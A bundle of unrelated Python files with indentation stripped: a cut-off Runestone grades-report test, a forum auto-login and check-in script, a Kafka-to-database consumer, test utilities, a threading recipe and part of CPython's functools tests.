unittest_kwargs = dict(event="unittest", div_id="units2", course=course_name)
# *User 0*: no data supplied
##----------------------------
# *User 1*: correct answers
##---------------------------
# It doesn't matter which user logs out, since all three users share the same client.
logout = test_user_array[2].test_client.logout
logout()
test_user_array[1].login()
assert_passing(1, act=test_user_array[1].username, **shortanswer_kwargs)
assert_passing(1, answer=json.dumps(["red", "away"]), **fitb_kwargs)
assert_passing(1, answer="0", correct="T", **mchoice_kwargs)
assert_passing(
1, answer=json.dumps({"code_snippets": ["def one(): return 1"]}), **lp_kwargs
)
assert_passing(1, act="percent:100:passed:2:failed:0", **unittest_kwargs)
# *User 2*: incorrect answers
##----------------------------
logout()
test_user_array[2].login()
# Add three shortanswer answers, to make sure the number of attempts is correctly recorded.
for x in range(3):
assert_passing(2, act=test_user_array[2].username, **shortanswer_kwargs)
assert_passing(2, answer=json.dumps(["xxx", "xxxx"]), **fitb_kwargs)
assert_passing(2, answer="1", correct="F", **mchoice_kwargs)
assert_passing(
2, answer=json.dumps({"code_snippets": ["def one(): return 2"]}), **lp_kwargs
)
assert_passing(2, act="percent:50:passed:1:failed:1", **unittest_kwargs)
# *User 3*: no data supplied, and no longer in course.
##----------------------------------------------------
# Wait until the autograder is run to remove the student, so they will have a grade but not have any submissions.
# **Test the grades_report endpoint**
##====================================
tu = test_user_array[2]
def grades_report(assignment, *args, **kwargs):
return tu.test_client.validate(
"assignments/grades_report",
*args,
data=dict(chap_or_assign=assignment, report_type="assignment"),
**kwargs
)
# Test not being an instructor.
grades_report("", "About Runestone")
tu.make_instructor()
# Test an invalid assignment.
grades_report("", "Unknown assignment")
# Create an assignment.
assignment_name = "test_assignment"
assignment_id = json.loads(
tu.test_client.validate(
"admin/createAssignment", data={"name": assignment_name}
)
)[assignment_name]
assignment_kwargs = dict(
assignment=assignment_id, autograde="pct_correct", which_to_grade="first_answer"
)
# Add questions to the assignment.
def add_to_assignment(question_kwargs, points):
assert (
tu.test_client.validate(
"admin/add__or_update_assignment_question",
data=dict(
question=question_kwargs["div_id"],
points=points,
**assignment_kwargs
),
)
!= json.dumps("Error")
)
# Determine the order of the questions and the _`point values`.
add_to_assignment(shortanswer_kwargs, 0)
add_to_assignment(fitb_kwargs, 1)
add_to_assignment(mchoice_kwargs, 2)
add_to_assignment(lp_kwargs, 3)
add_to_assignment(unittest_kwargs, 4)
# Autograde the assignment.
assignment_kwargs = dict(data={"assignment": assignment_name})
assert json.loads(
tu.test_client.validate("assignments/autograde", **assignment_kwargs)
)["message"].startswith("autograded")
assert json.loads(
tu.test_client.validate("assignments/calculate_totals", **assignment_kwargs)
)["success"]
# Remove test user 3 from the course. They can't be removed from the current course, so create a new one then add this user to it.
logout()
tu = test_user_array[3]
tu.login()
new_course = runestone_db_tools.create_course("random_course_name")
tu.update_profile(course_name=new_course.course_name, is_free=True)
tu.coursechooser(new_course.course_name)
tu.removecourse(course_name)
# **Test this assignment.**
# ===========================
# Log back in as the instructor.
logout()
tu = test_user_array[2]
tu.login()
# Now, we can get the report.
grades = json.loads(grades_report(assignment_name))
# Define a regex string comparison.
class RegexEquals:
def __init__(self, regex):
self.regex = re.compile(regex)
def __eq__(self, other):
return bool(re.search(self.regex, other))
# See if a date in ISO format followed by a "Z" is close to the current time.
class AlmostNow:
def __eq__(self, other):
# Parse the date string. Assume it ends with a Z and discard this.
assert other and other[-1] == "Z"
# Per the `docs <https://docs.python.org/3/library/datetime.html#datetime.date.fromisoformat>`_, this function requires Python 3.7+.
if sys.version_info >= (3, 7):
dt = datetime.datetime.fromisoformat(other[:-1])
return datetime.datetime.utcnow() - dt < datetime.timedelta(minutes=1)
else:
# Hope for the best on older Python.
return True
# These are based on the data input for each user earlier in this test.
expected_grades = {
"colHeaders": [
"userid",
"Family name",
"Given name",
"e-mail",
"avg grade (%)",
"1",
"1",
"1",
"2.1",
"2",
],
"data": [
[
"div_id",
"",
"",
"",
"",
"test_short_answer_1",
"test_fitb_1",
"test_mchoice_1",
"lp_demo_1",
"units2",
],
[
"location",
"",
"",
"",
"",
"index - ",
"index - ",
"index - ",
"lp_demo.py - ",
"index - ",
],
[
"type",
"",
"",
"",
"",
"shortanswer",
"fillintheblank",
"mchoice",
"lp_build",
"activecode",
],
# See the `point values`_ assigned earlier.
["points", "", "", "", "", 0, 1, 2, 3, 4],
["avg grade (%)", "", "", "", ""],
["avg attempts", "", "", "", ""],
["test_user_0", "user_0", "test", "test_user_0@foo.com", 0.0],
["test_user_1", "user_1", "test", "test_user_1@foo.com", 1.0],
["test_user_2", "user_2", "test", "test_user_2@foo.com", 0.2],
["test_user_3", "user_3", "test", "test_user_3@foo.com", 0.0],
],
# Correct since the first 3 questions are all on the index page.
"mergeCells": [{"col": 5, "colspan": 3, "row": 1, "rowspan": 1}],
"orig_data": [
# User 0: not submitted.
[
# The format is:
# ``[timestamp, score, answer, correct, num_attempts]``.
[None, 0.0, None, None, None], # shortanswer
[None, 0.0, None, None, None], # fillintheblank
[None, 0.0, None, None, None], # mchoice
[None, 0.0, {}, None, None], # lp_build
[None, 0.0, "", None, None], # activecode
],
# User 1: all correct.
[
[AlmostNow(), 0.0, "test_user_1", None, 1],
[AlmostNow(), 1.0, ["red", "away"], True, 1],
[AlmostNow(), 2.0, [0], True, 1],
[
AlmostNow(),
3.0,
{"code_snippets": ["def one(): return 1"], "resultString": ""},
100.0,
1,
],
[AlmostNow(), 4.0, "percent:100:passed:2:failed:0", True, 1],
],
# User 2: all incorrect.
[
[AlmostNow(), 0.0, "test_user_2", None, 3],
[AlmostNow(), 0.0, ["xxx", "xxxx"], False, 1],
[AlmostNow(), 0.0, [1], False, 1],
[
AlmostNow(),
0.0,
{
"code_snippets": ["def one(): return 2"],
"resultString": RegexEquals(
"Traceback \\(most recent call last\\):\n"
" File "
# Use a regex for the file's path.
'"\\S*lp_demo-test.py", '
"line 6, in <module>\n"
" assert one\\(\\) == 1\n"
"AssertionError"
),
},
0.0,
1,
],
[AlmostNow(), 2.0, "percent:50:passed:1:failed:1", False, 1],
],
# User 3: not submitted.
[
# The format is:
[None, 0.0, None, None, None],
[None, 0.0, None, None, None],
[None, 0.0, None, None, None],
[None, 0.0, {}, None, None],
[None, 0.0, "", None, None],
],
],
}
# Note: on test failure, pytest will report as incorrect all the ``AlmostNow()`` and ``RegexEquals`` items, even though they may have actually compared as equal.
# assert grades == expected_grades
# lets break this up a bit.
for k in expected_grades:
assert grades[k] == expected_grades[k]
logout()
# Test with no login.
grades_report("", "About Runestone")
def test_pageprogress(test_client, runestone_db_tools, test_user_1):
test_user_1.login()
test_user_1.hsblog(
event="mChoice",
act="answer:1:correct",
answer="1",
correct="T",
div_id="subc_b_1",
course=test_user_1.course.course_name,
)
# Since the user has answered the question the count for subc_b_1 should be 1
# cannot test the totals on the client without javascript but that is covered in the
# selenium tests on the components side.
test_user_1.test_client.validate(
"books/published/{}/test_chapter_1/subchapter_b.html".format(
test_user_1.course.base_course
),
'"subc_b_1": 1',
)
assert '"LearningZone_poll": 0' in test_user_1.test_client.text
assert '"subc_b_fitb": 0' in test_user_1.test_client.text
def test_lockdown(test_client, test_user_1):
test_user_1.login()
base_course = test_user_1.course.base_course
res = test_client.validate("books/published/{}/index.html".format(base_course))
assert '/default/user/login"> </a>' in res
assert "Runestone in social media:" in res
assert ">Change Course</a></li>" in res
assert 'id="profilelink">Edit' in res
assert '<ul class="dropdown-menu user-menu">' in res
assert 'div id="fb-root"></div' in res
assert "<span id='numuserspan'></span><span class='loggedinuser'></span>" in res
assert '<script async src="https://hypothes.is/embed.js"></script>' in res
# Do basic login/logout tests using Selenium. This is to make sure Selenium, rather than actually test something new.
def test_selenium(test_user_1, selenium_user):
selenium_user_1 = selenium_user(test_user_1)
selenium_user_1.login()
selenium_user_1.logout()
|
AutoEetopSign.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import logging
import re
from bs4 import BeautifulSoup
import requests
import sys
import time
from PIL import Image
import threading
class AutoDiscuz:
def __init__(self, forum_url, user_name, password):
"""初始化论坛 url、用户名、密码和代理服务器."""
self.header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.4",
"Referer": "https://bbs.eetop.cn/member.php?mod=logging&action=login"
""}
self.header2 = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.4",
"Accept": "image/webp,image/apng,image/*,*/*;q=0.8",
"Referer": "https://bbs.eetop.cn/member.php?mod=logging&action=login"}
self.forum_url = forum_url
self.is_login = False
self.post_data = {"username": user_name,
"password": password,
"seccodemodid": "member::logging",
"loginfield": 'username'
}
self.seccode = ''
self.formhash = ''
self.loginhash = ''
self.session = requests.Session()
#logging.basicConfig() # 初始化 logging,否则不会看到任何 requests 的输出。
#logging.getLogger().setLevel(logging.DEBUG)
#requests_log = logging.getLogger("requests.packages.urllib3")
#requests_log.setLevel(logging.DEBUG)
#requests_log.propagate = True
def login(self):
"""登录论坛."""
url_start = self.forum_url + "/member.php?mod=logging&action=login"
req = self.session.get(url_start, headers=self.header)
'''找到hash'''
soup = BeautifulSoup(req.text, 'lxml')
find0 = re.findall(r'\"seccode_(.*?)\"', req.text)
find1 = re.findall(r'name=\"formhash\" value=\"(.*?)\"', req.text)
find2 = re.findall(r'loginhash=(.*?)\"', req.text)
if find0 and find1:
self.seccode = find0[0]
self.formhash = find1[0]
self.loginhash = find2[0]
else:
print("can't find seccode or formhash")
sys.exit(2)
url_seccode = self.forum_url + '/misc.php?mod=seccode&action=update&idhash=%s&modid=member::logging' %self.seccode
req = self.session.get(url_seccode, headers=self.header)
'''找到验证码图片'''
find = re.findall(r'src=\"(misc\.php\?.*?)\"', req.text)
if find:
seccode_pic_url = find[0]
else:
print("can't find seccode")
sys.exit(2)
url_seccode_pic = self.forum_url + '/' + seccode_pic_url
print(url_seccode_pic)
self.session.headers.clear()
self.header2['Referer'] = url_seccode
req = self.session.get(url_seccode_pic, headers=self.header2)
with open('./captcha.jpg', 'wb') as f:
f.write(req.content)
capt = input('请输入图片里的验证码:')
'''验证验证码是否正确'''
url_verif_seccode = self.forum_url + '/misc.php?mod=seccode&action=check&inajax=1&modid=member::logging&idhash=%s&secverify=%s' %(self.seccode, capt)
req = self.session.get(url_verif_seccode, headers=self.header)
print(req.content)
'''登录'''
url_login = self.forum_url + "/member.php?mod=logging&action=login&loginsubmit=yes&loginhash=%s" %self.loginhash
print(url_login)
self.post_data["formhash"] = self.formhash
self.post_data["seccodehash"] = self.seccode
self.post_data["seccodeverify"] = capt
self.post_data["loginsubmit"] = 'true'
self.post_data["referer"] = 'https://bbs.eetop.cn/'
print(self.post_data)
self.session.headers.clear()
req = self.session.post(url_login, data=self.post_data, headers=self.header)
# url_code = self.forum_url + AutoDiscuz.LOGIN_CODE
# url = self.forum_url + AutoDiscuz.LOGIN_URL
# AutoDiscuz.LOGIN_POST["username"] = self.user_name
# AutoDiscuz.LOGIN_POST["password"] = self.password
# print(AutoDiscuz.LOGIN_POST)
# req = self.session.post(url, data=AutoDiscuz.LOGIN_POST)
# match = re.findall(r'name=\"formhash\" value=\"(.*?)\"', req.text)
# if match:
# AutoDiscuz.LOGIN_POST["formhash"] = match[0]
# else:
# print('can find formhash')
# sys.exit(2)
# if self.user_name in req.text:
# self.is_login = True
# if self.get_formhash():
# logging.info("Login success!")
# return
# else:
# logging.error("Login faild!")
# if self.is_login:
# self.is_login = False
# return
# req = self.session.post(url_code, headers=self.header)
# match = re.findall("\'seccode_(.*?)\'", req.text)
# if match:
# AutoDiscuz.LOGIN_POST["seccode"] = match[0]
# else:
# print('can find seccode')
# sys.exit(2)
# soup = BeautifulSoup(req.text, 'lxml')
# info = soup.select("#vseccode_cSHPWGkw img[src]")[0].get("src")
# req = self.session.post(self.forum_url + "/" + info, headers=self.header2)
# with open('./captcha.jpg', 'wb') as f:
# f.write(req.content)
# #img = Image.open('./captcha.jpg')
# #img_thread = threading.Thread(target=img.show, daemon=True)
# #img_thread.start()
# capt = input('请输入图片里的验证码:')
# AutoDiscuz.LOGIN_POST["seccodeverify"] = capt
# AutoDiscuz.LOGIN_POST["loginfield"] = 'username'
def check_in(self):
url = self.forum_url + \
"/home.php?mod=task&do=apply&id=14"
content = self.session.get(url).text
soup = BeautifulSoup(content, 'lxml')
info = soup.select(".f_c div p")[0].get_text()
if info:
self.is_login = True
print(info)
else:
self.is_login = False
def main():
auto_discuz = AutoDiscuz("https://bbs.eetop.cn", "【UserName】", "【Password】")
auto_discuz.login()
while True:
auto_discuz.check_in()
if auto_discuz.is_login:
time.sleep(5 * 60 * 59)
else:
print("break")
requests.post("https://sc.ftqq.com/【KEY】.send?title=eetop登录")
break
if __name__ == "__main__":
main()
# time.sleep(5 * 60 * 59)
|
main.py
|
#!/usr/bin/python3
#!/usr/bin/python3
from messaging import Consumer
from db import DataBase
from threading import Thread, Condition
import json
import time
import os
kafka_topic = "seg_analytics_data"
kafka_group = "kafka_to_db_converter"
class KafkaToDB(object):
def __init__(self):
super(KafkaToDB,self).__init__()
self._db=DataBase()
self._cache=[]
self._cond=Condition()
Thread(target=self._ingest).start()
def _ingest(self):
while True:
self._cond.acquire()
self._cond.wait()
bulk=self._cache
self._cache=[]
self._cond.release()
try:
self._db.save(bulk)
print("SaveToDB #"+str(len(bulk)), flush=True)
except Exception as e:
print("Exception: "+str(e), flush=True)
def _send(self, data):
self._cond.acquire()
self._cache.append(data)
self._cond.notify()
self._cond.release()
def listen(self):
while True:
print("listening to messages")
try:
c=Consumer(kafka_group)
for msg in c.messages(kafka_topic):
try:
value=json.loads(msg)
value["time"]=float(value["timestamp"])/1.0e9
if "tags" in value:
if "seg_time" in value["tags"]:
value["time"]=value["time"]+float(value["tags"]["seg_time"])
if "tag" in value:
if "seg_time" in value["tag"]:
value["time"]=value["time"]+float(value["tag"]["seg_time"])
stream=value["source"].split("/")[-2]
self._send((stream, value))
except Exception as e:
print("Exception: "+str(e), flush=True)
except Exception as e:
print("Exception: "+str(e), flush=True)
time.sleep(2)
k2d=KafkaToDB()
k2d.listen()
|
utils.py
|
"""
Utility functions used by the tests.
"""
import contextlib
import threading
def sort_fields(fields):
"""Helper to ensure named fields are sorted for the test."""
return ', '.join(sorted(field.lstrip() for field in fields.split(',')))
def skip_first_line(value):
"""Returns everything after the first newline in the string."""
parts = value.split("\n", 1)
return parts[1] if len(parts) == 2 else ''
def spawn(targets):
"""Spawns a bunch of threads for given targets and waits on them."""
threads = []
for target in targets:
thread = threading.Thread(target=target)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
@contextlib.contextmanager
def set_temporarily(obj, attr, value):
"""Temporarily change the value of an object's attribute."""
try:
original = getattr(obj, attr)
setattr(obj, attr, value)
yield
finally:
setattr(obj, attr, original)
|
cb2_9_5_sol_1.py
|
import threading, time, Queue
class MultiThread(object):
def __init__(self, function, argsVector, maxThreads=5, queue_results=False):
self._function = function
self._lock = threading.Lock()
self._nextArgs = iter(argsVector).next
self._threadPool = [ threading.Thread(target=self._doSome)
for i in range(maxThreads) ]
if queue_results:
self._queue = Queue.Queue()
else:
self._queue = None
def _doSome(self):
while True:
self._lock.acquire()
try:
try:
args = self._nextArgs()
except StopIteration:
break
finally:
self._lock.release()
result = self._function(args)
if self._queue is not None:
self._queue.put((args, result))
def get(self, *a, **kw):
if self._queue is not None:
return self._queue.get(*a, **kw)
else:
raise ValueError, 'Not queueing results'
def start(self):
for thread in self._threadPool:
time.sleep(0) # necessary to give other threads a chance to run
thread.start()
def join(self, timeout=None):
for thread in self._threadPool:
thread.join(timeout)
if __name__=="__main__":
import random
def recite_n_times_table(n):
for i in range(2, 11):
print "%d * %d = %d" % (n, i, n * i)
time.sleep(0.3 + 0.3*random.random())
mt = MultiThread(recite_n_times_table, range(2, 11))
mt.start()
mt.join()
print "Well done kids!"
|
test_functools.py
|
import abc
import builtins
import collections
import collections.abc
import copy
from itertools import permutations
import pickle
from random import choice
import sys
from test import support
import threading
import time
import typing
import unittest
import unittest.mock
import os
import weakref
import gc
from weakref import proxy
import contextlib
from test.support import import_helper
from test.support import threading_helper
from test.support.script_helper import assert_python_ok
import functools
py_functools = import_helper.import_fresh_module('functools',
blocked=['_functools'])
c_functools = import_helper.import_fresh_module('functools')
decimal = import_helper.import_fresh_module('decimal', fresh=['_decimal'])
@contextlib.contextmanager
def replaced_module(name, replacement):
original_module = sys.modules[name]
sys.modules[name] = replacement
try:
yield
finally:
sys.modules[name] = original_module
def capture(*args, **kw):
"""capture all positional and keyword arguments"""
return args, kw
def signature(part):
""" return the signature of a partial object """
return (part.func, part.args, part.keywords, part.__dict__)
class MyTuple(tuple):
pass
class BadTuple(tuple):
def __add__(self, other):
return list(self) + list(other)
class MyDict(dict):
pass
class TestPartial:
def test_basic_examples(self):
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertTrue(callable(p))
self.assertEqual(p(3, 4, b=30, c=40),
((1, 2, 3, 4), dict(a=10, b=30, c=40)))
p = self.partial(map, lambda x: x*10)
self.assertEqual(list(p([1,2,3,4])), [10, 20, 30, 40])
def test_attributes(self):
p = self.partial(capture, 1, 2, a=10, b=20)
# attributes should be readable
self.assertEqual(p.func, capture)
self.assertEqual(p.args, (1, 2))
self.assertEqual(p.keywords, dict(a=10, b=20))
def test_argument_checking(self):
self.assertRaises(TypeError, self.partial) # need at least a func arg
try:
self.partial(2)()
except TypeError:
pass
else:
self.fail('First arg not checked for callability')
def test_protection_of_callers_dict_argument(self):
# a caller's dictionary should not be altered by partial
def func(a=10, b=20):
return a
d = {'a':3}
p = self.partial(func, a=5)
self.assertEqual(p(**d), 3)
self.assertEqual(d, {'a':3})
p(b=7)
self.assertEqual(d, {'a':3})
def test_kwargs_copy(self):
# Issue #29532: Altering a kwarg dictionary passed to a constructor
# should not affect a partial object after creation
d = {'a': 3}
p = self.partial(capture, **d)
self.assertEqual(p(), ((), {'a': 3}))
d['a'] = 5
self.assertEqual(p(), ((), {'a': 3}))
def test_arg_combinations(self):
# exercise special code paths for zero args in either partial
# object or the caller
p = self.partial(capture)
self.assertEqual(p(), ((), {}))
self.assertEqual(p(1,2), ((1,2), {}))
p = self.partial(capture, 1, 2)
self.assertEqual(p(), ((1,2), {}))
self.assertEqual(p(3,4), ((1,2,3,4), {}))
def test_kw_combinations(self):
# exercise special code paths for no keyword args in
# either the partial object or the caller
p = self.partial(capture)
self.assertEqual(p.keywords, {})
self.assertEqual(p(), ((), {}))
self.assertEqual(p(a=1), ((), {'a':1}))
p = self.partial(capture, a=1)
self.assertEqual(p.keywords, {'a':1})
self.assertEqual(p(), ((), {'a':1}))
self.assertEqual(p(b=2), ((), {'a':1, 'b':2}))
# keyword args in the call override those in the partial object
self.assertEqual(p(a=3, b=2), ((), {'a':3, 'b':2}))
def test_positional(self):
# make sure positional arguments are captured correctly
for args in [(), (0,), (0,1), (0,1,2), (0,1,2,3)]:
p = self.partial(capture, *args)
expected = args + ('x',)
got, empty = p('x')
self.assertTrue(expected == got and empty == {})
def test_keyword(self):
# make sure keyword arguments are captured correctly
for a in ['a', 0, None, 3.5]:
p = self.partial(capture, a=a)
expected = {'a':a,'x':None}
empty, got = p(x=None)
self.assertTrue(expected == got and empty == ())
def test_no_side_effects(self):
# make sure there are no side effects that affect subsequent calls
p = self.partial(capture, 0, a=1)
args1, kw1 = p(1, b=2)
self.assertTrue(args1 == (0,1) and kw1 == {'a':1,'b':2})
args2, kw2 = p()
self.assertTrue(args2 == (0,) and kw2 == {'a':1})
def test_error_propagation(self):
def f(x, y):
x / y
self.assertRaises(ZeroDivisionError, self.partial(f, 1, 0))
self.assertRaises(ZeroDivisionError, self.partial(f, 1), 0)
self.assertRaises(ZeroDivisionError, self.partial(f), 1, 0)
self.assertRaises(ZeroDivisionError, self.partial(f, y=0), 1)
def test_weakref(self):
f = self.partial(int, base=16)
p = proxy(f)
self.assertEqual(f.func, p.func)
f = None
support.gc_collect() # For PyPy or other GCs.
self.assertRaises(ReferenceError, getattr, p, 'func')
def test_with_bound_and_unbound_methods(self):
data = list(map(str, range(10)))
join = self.partial(str.join, '')
self.assertEqual(join(data), '0123456789')
join = self.partial(''.join)
self.assertEqual(join(data), '0123456789')
def test_nested_optimization(self):
partial = self.partial
inner = partial(signature, 'asdf')
nested = partial(inner, bar=True)
flat = partial(signature, 'asdf', bar=True)
self.assertEqual(signature(nested), signature(flat))
def test_nested_partial_with_attribute(self):
# see issue 25137
partial = self.partial
def foo(bar):
return bar
p = partial(foo, 'first')
p2 = partial(p, 'second')
p2.new_attr = 'spam'
self.assertEqual(p2.new_attr, 'spam')
def test_repr(self):
args = (object(), object())
args_repr = ', '.join(repr(a) for a in args)
kwargs = {'a': object(), 'b': object()}
kwargs_reprs = ['a={a!r}, b={b!r}'.format_map(kwargs),
'b={b!r}, a={a!r}'.format_map(kwargs)]
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
self.assertEqual(f'{name}({capture!r})', repr(f))
f = self.partial(capture, *args)
self.assertEqual(f'{name}({capture!r}, {args_repr})', repr(f))
f = self.partial(capture, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
f = self.partial(capture, *args, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {args_repr}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
def test_recursive_repr(self):
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
self.assertEqual(repr(f), '%s(...)' % (name,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
self.assertEqual(repr(f), '%s(%r, ...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
self.assertEqual(repr(f), '%s(%r, a=...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
def test_pickle(self):
with self.AllowPickle():
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertEqual(signature(f_copy), signature(f))
def test_copy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.copy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIs(f_copy.attr, f.attr)
self.assertIs(f_copy.args, f.args)
self.assertIs(f_copy.keywords, f.keywords)
def test_deepcopy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.deepcopy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIsNot(f_copy.attr, f.attr)
self.assertIsNot(f_copy.args, f.args)
self.assertIsNot(f_copy.args[0], f.args[0])
self.assertIsNot(f_copy.keywords, f.keywords)
self.assertIsNot(f_copy.keywords['bar'], f.keywords['bar'])
def test_setstate(self):
f = self.partial(signature)
f.__setstate__((capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(signature(f),
(capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), dict(a=10), None))
self.assertEqual(signature(f), (capture, (1,), dict(a=10), {}))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), None, None))
#self.assertEqual(signature(f), (capture, (1,), {}, {}))
self.assertEqual(f(2, b=20), ((1, 2), {'b': 20}))
self.assertEqual(f(2), ((1, 2), {}))
self.assertEqual(f(), ((1,), {}))
f.__setstate__((capture, (), {}, None))
self.assertEqual(signature(f), (capture, (), {}, {}))
self.assertEqual(f(2, b=20), ((2,), {'b': 20}))
self.assertEqual(f(2), ((2,), {}))
self.assertEqual(f(), ((), {}))
def test_setstate_errors(self):
f = self.partial(signature)
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}))
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}, {}, None))
self.assertRaises(TypeError, f.__setstate__, [capture, (), {}, None])
self.assertRaises(TypeError, f.__setstate__, (None, (), {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, None, {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, [], {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, (), [], None))
def test_setstate_subclasses(self):
f = self.partial(signature)
f.__setstate__((capture, MyTuple((1,)), MyDict(a=10), None))
s = signature(f)
self.assertEqual(s, (capture, (1,), dict(a=10), {}))
self.assertIs(type(s[1]), tuple)
self.assertIs(type(s[2]), dict)
r = f()
self.assertEqual(r, ((1,), {'a': 10}))
self.assertIs(type(r[0]), tuple)
self.assertIs(type(r[1]), dict)
f.__setstate__((capture, BadTuple((1,)), {}, None))
s = signature(f)
self.assertEqual(s, (capture, (1,), {}, {}))
self.assertIs(type(s[1]), tuple)
r = f(2)
self.assertEqual(r, ((1, 2), {}))
self.assertIs(type(r[0]), tuple)
def test_recursive_pickle(self):
with self.AllowPickle():
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(RecursionError):
pickle.dumps(f, proto)
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.args[0], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.keywords['a'], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
# Issue 6083: Reference counting bug
def test_setstate_refcount(self):
class BadSequence:
def __len__(self):
return 4
def __getitem__(self, key):
if key == 0:
return max
elif key == 1:
return tuple(range(1000000))
elif key in (2, 3):
return {}
raise IndexError
f = self.partial(object)
self.assertRaises(TypeError, f.__setstate__, BadSequence())
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialC(TestPartial, unittest.TestCase):
if c_functools:
partial = c_functools.partial
class AllowPickle:
def __enter__(self):
return self
def __exit__(self, type, value, tb):
return False
def test_attributes_unwritable(self):
# attributes should not be writable
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertRaises(AttributeError, setattr, p, 'func', map)
self.assertRaises(AttributeError, setattr, p, 'args', (1, 2))
self.assertRaises(AttributeError, setattr, p, 'keywords', dict(a=1, b=2))
p = self.partial(hex)
try:
del p.__dict__
except TypeError:
pass
else:
self.fail('partial object allowed __dict__ to be deleted')
def test_manually_adding_non_string_keyword(self):
p = self.partial(capture)
# Adding a non-string/unicode keyword to partial kwargs
p.keywords[1234] = 'value'
r = repr(p)
self.assertIn('1234', r)
self.assertIn("'value'", r)
with self.assertRaises(TypeError):
p()
def test_keystr_replaces_value(self):
p = self.partial(capture)
class MutatesYourDict(object):
def __str__(self):
p.keywords[self] = ['sth2']
return 'astr'
# Replacing the value during key formatting should keep the original
# value alive (at least long enough).
p.keywords[MutatesYourDict()] = ['sth']
r = repr(p)
self.assertIn('astr', r)
self.assertIn("['sth']", r)
class TestPartialPy(TestPartial, unittest.TestCase):
partial = py_functools.partial
class AllowPickle:
def __init__(self):
self._cm = replaced_module("functools", py_functools)
def __enter__(self):
return self._cm.__enter__()
def __exit__(self, type, value, tb):
return self._cm.__exit__(type, value, tb)
if c_functools:
class CPartialSubclass(c_functools.partial):
pass
class PyPartialSubclass(py_functools.partial):
pass
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialCSubclass(TestPartialC):
if c_functools:
partial = CPartialSubclass
# partial subclasses are not optimized for nested calls
test_nested_optimization = None
class TestPartialPySubclass(TestPartialPy):
partial = PyPartialSubclass
class TestPartialMethod(unittest.TestCase):
class A(object):
nothing = functools.partialmethod(capture)
positional = functools.partialmethod(capture, 1)
keywords = functools.partialmethod(capture, a=2)
both = functools.partialmethod(capture, 3, b=4)
spec_keywords = functools.partialmethod(capture, self=1, func=2)
nested = functools.partialmethod(positional, 5)
over_partial = functools.partialmethod(functools.partial(capture, c=6), 7)
static = functools.partialmethod(staticmethod(capture), 8)
cls = functools.partialmethod(classmethod(capture), d=9)
a = A()
def test_arg_combinations(self):
self.assertEqual(self.a.nothing(), ((self.a,), {}))
self.assertEqual(self.a.nothing(5), ((self.a, 5), {}))
self.assertEqual(self.a.nothing(c=6), ((self.a,), {'c': 6}))
self.assertEqual(self.a.nothing(5, c=6), ((self.a, 5), {'c': 6}))
self.assertEqual(self.a.positional(), ((self.a, 1), {}))
self.assertEqual(self.a.positional(5), ((self.a, 1, 5), {}))
self.assertEqual(self.a.positional(c=6), ((self.a, 1), {'c': 6}))
self.assertEqual(self.a.positional(5, c=6), ((self.a, 1, 5), {'c': 6}))
self.assertEqual(self.a.keywords(), ((self.a,), {'a': 2}))
self.assertEqual(self.a.keywords(5), ((self.a, 5), {'a': 2}))
self.assertEqual(self.a.keywords(c=6), ((self.a,), {'a': 2, 'c': 6}))
self.assertEqual(self.a.keywords(5, c=6), ((self.a, 5), {'a': 2, 'c': 6}))
